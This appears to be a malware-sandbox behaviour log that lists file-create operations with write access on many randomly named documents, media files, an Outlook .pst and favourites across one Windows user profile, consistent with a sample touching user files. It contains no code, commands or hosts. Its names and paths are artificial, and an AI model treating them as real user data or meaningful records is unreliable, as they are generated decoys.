Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mSBpETwT0_vcERkN.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\N-K3DozDdSgAnSFGZTgY.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NX4iP.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\O2S3Yxp w.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\qi4IqurK09.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Qt-jSAXq.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\S-x55k_cPLVq5X206.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SmhleleUG.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SP2GZ4Hm5D5gkPiI7Yd.odt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ueOgE3Fdxzan.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uzFjE-EbKZbDlUR6.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\w6EPq2zN2ah.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\W6IMk7.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WBp8E7tRnFvGA7kM1v.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\xDyNG4Bi0L.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XXACe99aeIe9AwdxB.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_JLH3OA.odt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\-avjGaTi5fer-bMia.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\8GQt402SpMYiSB.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\9Tpbrmx9-eI2m3we6r.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\ArZI.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\EfZdtNhwP.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Hgc-ATkiW0nvYtLeb_2n.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\HLn_CQ4.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\iYZ-gLKtWydBalI Lxxb.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\j pK_84.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\NBJbBMpw.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\P8IAG.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\RAzu8DVMv-r45eOe8.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\svbuVRxjZk-A.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\xGq9s.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\YEmk 2o.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z29_EgFwKYFm3nLlZNM.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4mbF.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\pCb9pgcYyZh0BJvZP_h.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Everywhere.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Indexed Locations.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-cTwhDb_kz0NM.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-odfzMtVfgsa IL.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\1wkpap.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\4wuSJ8EnkH3MW.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8caLHfAk0PaW.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8rejvdNsx1W.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\90ZHyHwir.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AklgegIwErKzeM3EnB.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AKzil.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\aY2-M1hNNjjWY.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\BqAvk1V3qDn9l.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\bZE6e7_.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\DJt2bijl-Kw7JEUBg.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\hAf_3U-gHvce4wcnQA_w.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HlD5zrxsdUc1Y3OP7nh.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\isz2C.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\J6vHB4Uh4HDmN.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\KEVeaf.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\kUiTedID_arfjfDWv.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\LA0fDt.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\nzD16NoQ.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ODTwo4qOOJx.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\PNAkUcrgBy4hgy2ZfZzW.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\Qm7ufohlk1udTd4Kn5.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qswPmOaFTerp.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qVm94.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\QWssd9nb3vYvw99.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\RLWhOE4xU0nYY34j.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\SY7CEy_advQ-GPuP.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\sz7_xapMC.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\UCiGSIuisINE78_i.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\UOIbo9FKzWl25DD93Yi9.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\X4T9oiLBOsZNDrM.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\YcDckA2w- DNgH7cL.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\21IMcPko8Du_3IsFB-Q.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\kqfuGsV.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lpSHh6l1qJtVRTN-Ti0s.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\Pla8UWh-7PWmaOK2.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\qBg34ZfuK.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\upDp4KTN.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\OBWh_DIngrZmxYk.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\p uXvDzcIfFbqot.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\Pt He.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\ug1Kmdfe1kMSfX_H.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\8D Vnyq.pps	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\BykHThXT56fcYaqQV2X.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\dv6T5k65sGE5bg7xPK.pps	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\GoUIrAAbbfuwwj-FRw.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\hk7Xm32Lt1utxRomo79.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\KvTi3ZX.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\lA9UBwHgz3W.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\nnz1zWbbzOZyy0IcqsRw.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\S-tHiiR.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\spMPG 9xkkM.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\Tgy4aDx5L5gYbgCK1.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\UTVyOlBsO.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\WEpp.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\x29MLGrvh.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\0sb N ZRL9SdkEk.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\1rcxkwS-WVFCcNTFOvBu.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\4qxq GBI03hb94VB1Bxh.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\5Ek2Ncsbu3-Kn69J_.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
